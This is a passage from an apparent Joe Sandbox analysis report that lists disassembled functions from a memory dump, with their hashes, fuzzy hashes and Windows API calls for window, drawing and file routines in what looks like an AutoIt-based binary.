                                                                      • Opcode ID: fc4e50c2d0e0806b3ce235c9b49372ef77cea628ba001766913906425c4dee6f
                                                                      • Instruction ID: 1dff74346acff82de6c61ebf0c9c9771448e0f2e6aa2bf0bdd5e56e93d1dc639
                                                                      • Opcode Fuzzy Hash: fc4e50c2d0e0806b3ce235c9b49372ef77cea628ba001766913906425c4dee6f
                                                                      • Instruction Fuzzy Hash: 48E04F322142049FC710EF6AD855E9AFBE9AF99760F00845AFC4AD7351DB70E8809B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction ID: 909d1e8ae6773ba9af078ce6fce3428f448a365029cb7d423f1363590ce52568
                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction Fuzzy Hash: 0D516A716CC6056BDF38862A889DFBE23D5DB12340F1805DDEA86D7282CE61DE01DF66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD6DD9 Relevance: .6, Instructions: 637COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c962464e4a37df8790d947ccb5fdda6489dcd1f7f3d218ccfd73a76da3220204
                                                                      • Instruction ID: a6a3691b097ec5e56e52cdef9cf7b512d3909555b1afdf80ead77f863a4a93e7
                                                                      • Opcode Fuzzy Hash: c962464e4a37df8790d947ccb5fdda6489dcd1f7f3d218ccfd73a76da3220204
                                                                      • Instruction Fuzzy Hash: F7322226D69F014DD7239634D822339A689AFB73C5F55C737F81AB5AAAFF29C4834100
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BBCC39 Relevance: .6, Instructions: 635COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 115b9d5d900c3b8ee04efaa5ee0c5f3ca878b33566a22ae450cb8fab455f27dc
                                                                      • Instruction ID: d425e2f241248869be8054ef29ce8ef6f605f328984b96e616e6dd1c4c7f6775
                                                                      • Opcode Fuzzy Hash: 115b9d5d900c3b8ee04efaa5ee0c5f3ca878b33566a22ae450cb8fab455f27dc
                                                                      • Instruction Fuzzy Hash: 5E32F431A0414D8BCF28CE29C6D46BD7FE1EB45300F2885EAD65ACB296D3709DC9DB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA7920 Relevance: .6, Instructions: 563COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4b7b169ee080bca516ada4d42eab0247b125bc589ac955f2944a041901e09d6
                                                                      • Instruction ID: f78286f51ee86ed7d04c5d97bbd1437871879975678e53f1279e0c829c8f6796
                                                                      • Opcode Fuzzy Hash: a4b7b169ee080bca516ada4d42eab0247b125bc589ac955f2944a041901e09d6
                                                                      • Instruction Fuzzy Hash: 5C22A1B0A0860AEFDF14CF65C881AAEB3F5FF45304F1445A9E816A7291EB35AD15CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA91C0 Relevance: .5, Instructions: 475COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2804cf595d6e00f0a2cf31eded419d618401bcb7fda9d91d352bd54e61952d3
                                                                      • Instruction ID: fe24a11c5998c9efc6efd0375eff6b58c534cb1ce195055ede8ccfcecc14261b
                                                                      • Opcode Fuzzy Hash: f2804cf595d6e00f0a2cf31eded419d618401bcb7fda9d91d352bd54e61952d3
                                                                      • Instruction Fuzzy Hash: 9D02A5B0E00246EBDB14DF65D881BAEB7F5FF44300F1081A9E8169B391EB71EA11DB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC19B0 Relevance: .2, Instructions: 240COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction ID: eca8ef6f3bec72f41531e77c5693283af363a126b6130355e6f9da5183a91734
                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction Fuzzy Hash: 73914A722090A34ADB2D467D8574A3DFFE19A533A13190BDDE4F2DA1C2FD24C965D620
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC7A4A Relevance: .2, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dcacdbfb90637a371881b614cd7cead2a12a14af116f693b82f5d278324c3a9a
                                                                      • Instruction ID: 3f2fdc04e442e69c2248f9a1728657ac3c04d39dd2dc3d9f9690401b0d56ba66
                                                                      • Opcode Fuzzy Hash: dcacdbfb90637a371881b614cd7cead2a12a14af116f693b82f5d278324c3a9a
                                                                      • Instruction Fuzzy Hash: 596136717C8709A6DB349A2889A5FBF23D4DF41710F1409DEF882DB281DE519E428F55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC7CA7 Relevance: .2, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d59e8ed12c3cbf7e995441ff0062cdd822e6bb5b32d522b63f5a22d796f4ef69
                                                                      • Instruction ID: 65d68466db1511d181e75fd3b8e364e0a86224dbf910fb23c87b36f59bb4e46c
                                                                      • Opcode Fuzzy Hash: d59e8ed12c3cbf7e995441ff0062cdd822e6bb5b32d522b63f5a22d796f4ef69
                                                                      • Instruction Fuzzy Hash: 7C616BB26C870A67DA389A284896FBF23D8DF41740F1009FDF843DB281DE129D42CE55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC1706 Relevance: .2, Instructions: 232COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction ID: 2378da0972e3d0603f03b5f5a78a99823320c5526706a6d45649cbf201f9cb71
                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction Fuzzy Hash: 3781777260D0A349DB2D463D857493EFFE19A933A131A0BDED4F2DA1C3EE24C955D620
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C12046 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 44efcf01abca864eb748ed96d3b04504d2efe77390c1dc73f4812cc06671f852
                                                                      • Instruction ID: 2b93dd3de63335e88f9165079c2def7a7a363cfe1f1719a4d679c5a56ed5d333
                                                                      • Opcode Fuzzy Hash: 44efcf01abca864eb748ed96d3b04504d2efe77390c1dc73f4812cc06671f852
                                                                      • Instruction Fuzzy Hash: 2321A5326206118BDB28CF79C8227BE73E5A754310F25862EE4A7C37D1DE39A944DB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C22ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00C22B30
                                                                      • DeleteObject.GDI32(00000000), ref: 00C22B43
                                                                      • DestroyWindow.USER32 ref: 00C22B52
                                                                      • GetDesktopWindow.USER32 ref: 00C22B6D
                                                                      • GetWindowRect.USER32(00000000), ref: 00C22B74
                                                                      • SetRect.USER32 ref: 00C22CA3
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C22CB1
                                                                      • CreateWindowExW.USER32 ref: 00C22CF8
                                                                      • GetClientRect.USER32 ref: 00C22D04
                                                                      • CreateWindowExW.USER32 ref: 00C22D40
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00C22D62
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D75
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D80
                                                                      • GlobalLock.KERNEL32 ref: 00C22D89
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C22D98
                                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22DA1
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C22DA8
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00C22DB3
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C22DC5
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C3FC38,00000000), ref: 00C22DDB
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00C22DEB
                                                                      • CopyImage.USER32 ref: 00C22E11
                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C22E30
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00C22E52
                                                                      • ShowWindow.USER32(00000004), ref: 00C2303F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 062f213d4a729d855a8fa1cd44edefde9c7fb0073f2f496221d3e5817de8bb53
                                                                      • Instruction ID: 81eeff2b0e6bb7eead765bc12150f108f514772a89e218da3a95784a1b568cac
                                                                      • Opcode Fuzzy Hash: 062f213d4a729d855a8fa1cd44edefde9c7fb0073f2f496221d3e5817de8bb53
                                                                      • Instruction Fuzzy Hash: C5026971A10219AFDB14DFA4DC89FAE7BB9EF49310F048158F915AB2A1CB74ED41CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C370D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00C3712F
                                                                      • GetSysColorBrush.USER32 ref: 00C37160
                                                                      • GetSysColor.USER32 ref: 00C3716C
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00C37186
                                                                      • SelectObject.GDI32(?,?), ref: 00C37195
                                                                      • InflateRect.USER32 ref: 00C371C0
                                                                      • GetSysColor.USER32 ref: 00C371C8
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00C371CF
                                                                      • FrameRect.USER32 ref: 00C371DE
                                                                      • DeleteObject.GDI32(00000000), ref: 00C371E5
                                                                      • InflateRect.USER32 ref: 00C37230
                                                                      • FillRect.USER32 ref: 00C37262
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C37284
                                                                        • Part of subcall function 00C373E8: GetSysColor.USER32 ref: 00C37421
                                                                        • Part of subcall function 00C373E8: SetTextColor.GDI32(?,?), ref: 00C37425
                                                                        • Part of subcall function 00C373E8: GetSysColorBrush.USER32 ref: 00C3743B
                                                                        • Part of subcall function 00C373E8: GetSysColor.USER32 ref: 00C37446
                                                                        • Part of subcall function 00C373E8: GetSysColor.USER32 ref: 00C37463
                                                                        • Part of subcall function 00C373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C37471
                                                                        • Part of subcall function 00C373E8: SelectObject.GDI32(?,00000000), ref: 00C37482
                                                                        • Part of subcall function 00C373E8: SetBkColor.GDI32(?,00000000), ref: 00C3748B
                                                                        • Part of subcall function 00C373E8: SelectObject.GDI32(?,?), ref: 00C37498
                                                                        • Part of subcall function 00C373E8: InflateRect.USER32 ref: 00C374B7
                                                                        • Part of subcall function 00C373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C374CE
                                                                        • Part of subcall function 00C373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00C374DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                      • String ID:
                                                                      • API String ID: 4124339563-0
                                                                      • Opcode ID: a09bd51e427aa6f6ea707d5220594f299d6b2b339d8f5307ddcc099ea99855c5
                                                                      • Instruction ID: 1158584cf5a885e73b2aa752f487cde26d01bc38c808ae382ef21e405ca5a008
                                                                      • Opcode Fuzzy Hash: a09bd51e427aa6f6ea707d5220594f299d6b2b339d8f5307ddcc099ea99855c5
                                                                      • Instruction Fuzzy Hash: A7A18EB2018301EFDB109F64DC88B6F7BA9FB49321F100B19F962A61E1D775E944DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32 ref: 00BB8E14
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BF6AC5
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BF6AFE
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BF6F43
                                                                        • Part of subcall function 00BB8F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00BB8FC5
                                                                      • SendMessageW.USER32(?,00001053), ref: 00BF6F7F
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BF6F96
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00BF6FAC
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00BF6FB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 2760611726-4108050209
                                                                      • Opcode ID: 3092b9e54e4ee5d76bd7e05797f6096326d2d9330ee2dd4bc5eb03e5d1bb8caa
                                                                      • Instruction ID: 790a1166e1859a0b586f60b957a8a288019c676a2b377dfbdb233cf8482447da
                                                                      • Opcode Fuzzy Hash: 3092b9e54e4ee5d76bd7e05797f6096326d2d9330ee2dd4bc5eb03e5d1bb8caa
                                                                      • Instruction Fuzzy Hash: FE12AD35200205DFDB25DF28C884BB9B7F5FB44310F1884A9FA899B261CB71EC96DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C22711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32 ref: 00C2273E
                                                                      • SystemParametersInfoW.USER32 ref: 00C2286A
                                                                      • SetRect.USER32 ref: 00C228A9
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C228B9
                                                                      • CreateWindowExW.USER32 ref: 00C22900
                                                                      • GetClientRect.USER32 ref: 00C2290C
                                                                      • CreateWindowExW.USER32 ref: 00C22955
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C22964
                                                                      • GetStockObject.GDI32(00000011), ref: 00C22974
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00C22978
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 00C22988
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C22991
                                                                      • DeleteDC.GDI32(00000000), ref: 00C2299A
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C229C6
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C229DD
                                                                      • CreateWindowExW.USER32 ref: 00C22A1D
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C22A31
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C22A42
                                                                      • CreateWindowExW.USER32 ref: 00C22A77
                                                                      • GetStockObject.GDI32(00000011), ref: 00C22A82
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C22A8D
                                                                      • ShowWindow.USER32(00000004), ref: 00C22A97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
